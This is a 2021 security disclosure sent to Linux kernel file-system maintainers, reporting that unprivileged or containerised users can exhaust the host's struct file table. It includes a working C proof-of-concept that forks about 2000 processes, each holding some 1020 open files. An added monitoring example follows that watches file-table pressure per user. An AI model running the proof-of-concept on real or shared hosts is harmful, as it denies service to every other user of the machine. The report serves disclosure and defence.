* Report Bug to Linux File System
@ 2021-09-05  6:12 杨男子
  2021-09-05 17:16 ` Greg KH
From: 杨男子 @ 2021-09-05  6:12 UTC (permalink / raw)
  To: viro; +Cc: linux-fsdevel, security

Hi, our team has found a problem in the fs system on Linux kernel v5.10, leading to DoS attacks.

The struct file can be exhausted by normal users by calling multiple syscalls such as timerfd_create/pipe/open etc. Although the rlimit limits the max fds that can be opened by a single process, a normal user can fork multiple processes, repeatedly make the timerfd_create/pipe/open syscalls and exhaust all struct files. As a result, all struct-file-allocation related operations of all other users will fail.

In fact, we tried this attack inside a deprivileged docker container without any capabilities. The processes in the docker container can exhaust all struct-files on the host kernel. We use a machine with 16G memory. We start 2000 processes, each process with a 1024 limit. In total, around 1613400 struct-files are consumed and there are no available struct-files in the kernel. The total consumed memory is less than 2G, which is small, so the memory control group cannot help.

The following code shows a PoC that takes 1613400 struct-files, taking all struct-files on the host. We evaluated the PoC on an Intel i5 CPU physical machine + Linux kernel v5.10.0 + Ubuntu 18.04 LTS + Docker 18.06.0-ce.
-----------------------------------------------
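#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

int main()
{
    /* The parent forks the child processes. */
    for (int i = 1; i < 2000; i++) {
        int pid = fork();
        if (pid == 0) {
            int fd;
            char nameout[20];
            /* Each child stays below its own 1024-fd rlimit. */
            for (int j = 1; j <= 1020; j++) {
                sprintf(nameout, "test%d%d.txt", i, j);
                /* O_CREAT requires an explicit mode argument. */
                fd = open(nameout, O_CREAT, 0600);
            }
            /* Block so the descriptors stay open. */
            getchar();
        }
    }
    getchar();
    return 0;
}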
-----------------------------------------------

Looking forward to your reply!
Nanzi Yang
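
The point of the report, that a per-process rlimit does not bound how many struct file objects one user holds across many processes, can be watched for on the host. The C sketch below is an added example, not part of the original message: it parses the kernel's /proc/sys/fs/file-nr counters and sums per-process fd counts by UID. The struct names, helper functions and sample values are constructed for illustration; on a live system the text would be read from /proc/sys/fs/file-nr and the per-process counts from the entries under /proc/<pid>/fd.

```c
/* Added example: host-side view of system-wide struct file pressure. */
#include <stdio.h>

struct file_nr { unsigned long long allocated, unused, max; };
struct proc_sample { unsigned uid; unsigned long nfds; };   /* one process */

/* Parse /proc/sys/fs/file-nr: "<allocated> <unused> <max>". 0 on success. */
int parse_file_nr(const char *text, struct file_nr *out)
{
    if (sscanf(text, "%llu %llu %llu",
               &out->allocated, &out->unused, &out->max) != 3)
        return -1;
    return (out->max == 0 || out->unused > out->allocated) ? -1 : 0;
}

/* Percentage of the system-wide struct file table currently in use. */
unsigned pressure_pct(const struct file_nr *f)
{
    return (unsigned)((f->allocated - f->unused) * 100 / f->max);
}

/* Sum fds per UID; return the largest per-UID total and store that UID. */
unsigned long long top_uid(const struct proc_sample *p, size_t n, unsigned *uid)
{
    unsigned long long best = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned long long sum = 0;
        for (size_t j = 0; j < n; j++)
            if (p[j].uid == p[i].uid)
                sum += p[j].nfds;
        if (sum > best) { best = sum; *uid = p[i].uid; }
    }
    return best;
}

int main(void)
{
    /* Constructed samples: every process is individually under a 1024 rlimit. */
    const struct proc_sample procs[] = {
        {1000, 1023}, {1000, 1023}, {1000, 1023}, {0, 40}, {33, 12} };
    const char *sample = "3200\t0\t3277\n";    /* constructed file-nr content */
    struct file_nr f;
    unsigned uid = 0;
    if (parse_file_nr(sample, &f) != 0) return 1;
    unsigned long long held = top_uid(procs, 5, &uid);
    printf("file table %u%% full; uid %u holds %llu of max %llu\n",
           pressure_pct(&f), uid, held, f.max);
    return 0;
}
```

No single process in the sample exceeds its rlimit, yet one UID accounts for nearly the whole table, which is the condition a per-process limit cannot catch.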
